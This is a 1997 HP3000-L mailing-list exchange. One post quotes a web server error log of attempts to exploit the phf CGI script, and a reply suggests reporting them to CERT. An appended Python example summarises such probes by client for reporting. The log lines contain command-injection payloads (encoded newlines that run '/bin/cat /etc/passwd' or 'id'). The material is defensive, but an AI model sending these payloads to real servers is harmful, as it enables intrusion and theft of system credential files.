HP3000-L Archives

May 1997, Week 2

HP3000-L@RAVEN.UTC.EDU

Date: Fri, 9 May 1997 16:37:01 -0400
<snip>
/WWW/WWW/ARPA/httpd_1.3/logs>cat error | grep phf
[Sun Mar 23 11:22:39 1997] httpd: access to /cgi-bin/phf?Qname=%0Acat%20/etc/p
swd denied for t6o16p8.telia.com, reason: file not found
[Sun Apr  6 17:37:06 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for wxs7-2.worldaccess.nl, reason: file not found
[Tue Apr  8 15:17:31 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for wxs8-14.worldaccess.nl, reason: file not found
[Thu Apr 17 06:47:50 1997] httpd: access to /cgi-bin/phf?Q=%0aid denied for pc
-slip.ccs-stag.deakin.edu.au, reason: file not found
[Mon Apr 21 15:03:31 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for wxs8-4.worldaccess.nl, reason: file not found
[Wed Apr 23 06:58:00 1997] httpd: access to /cgi-bin/phf?Qname=asd=%0acat%20/e
/passwd denied for wimol2.wimol.ksc.co.th, reason: file not found
[Mon May  5 06:27:41 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for 139.134.243.139, reason: file not found

While I don't know if phf can get to files in other accounts on the 3000(?),
it's still best disabled. Be careful out there.

               -Chris Bartram
</snip>

Chris,

Thank you for warning us about this weakness.

Is there anyone you can send this file fragment to, to let them know that
you have intruders attempting to exploit a well known weakness?
Organizations like CERT and others?

Marshall Medoff, ITA, Inc.
Arlington, Virginia
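
An added example, not part of either message above: one way to turn error-log entries in the quoted format into a per-client summary that could accompany a report to CERT or to the source networks. The sample log is constructed, and the function names are hypothetical. Wrapped lines are rejoined before matching, because a line-by-line search misses an encoded newline that the wrap splits in two.

```python
import re
from collections import defaultdict

# Constructed sample in the error-log format quoted above (documentation
# hosts, invented timestamps), wrapped the way a fixed-width display wraps.
SAMPLE_LOG = """\
[Sun Apr  6 17:37:06 1997] httpd: access to /cgi-bin/phf?Q=%0
aid denied for dialup7.example.net, reason: file not found
[Tue Apr  8 15:17:31 1997] httpd: access to /cgi-bin/phf?Qname=%0Aid denied for dial
up7.example.net, reason: file not found
[Wed Apr  9 09:00:00 1997] httpd: access to /docs/old.html denied for www.example.org, reason: file not found
[Thu Apr 10 10:10:10 1997] httpd: access to /cgi-bin/phf?Qalias=smith denied for 192.0.2.15, reason: file not found
"""

ENTRY = re.compile(
    r"^\[(?P<when>[^\]]+)\] httpd: access to (?P<path>\S+) "
    r"denied for (?P<client>[^,\s]+), reason: (?P<reason>.*)$")

def join_wrapped(text):
    """Rejoin entries that a fixed-width display split across lines."""
    entries = []
    for line in text.splitlines():
        if line.startswith("[") or not entries:
            entries.append(line)      # a new entry starts with its timestamp
        else:
            entries[-1] += line       # continuation of the previous entry
    return entries

def phf_probes(text):
    """Return (when, client, path, has_newline) for every request to phf."""
    hits = []
    for m in filter(None, map(ENTRY.match, join_wrapped(text))):
        script = m["path"].split("?", 1)[0].rsplit("/", 1)[-1]
        if script.lower() == "phf":
            encoded_nl = "%0a" in m["path"].lower()   # matches %0a and %0A
            hits.append((m["when"], m["client"], m["path"], encoded_nl))
    return hits

def by_client(hits):
    """Group timestamps of encoded-newline requests by client host."""
    report = defaultdict(list)
    for when, client, _path, encoded_nl in hits:
        if encoded_nl:
            report[client].append(when)
    return dict(report)
```
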
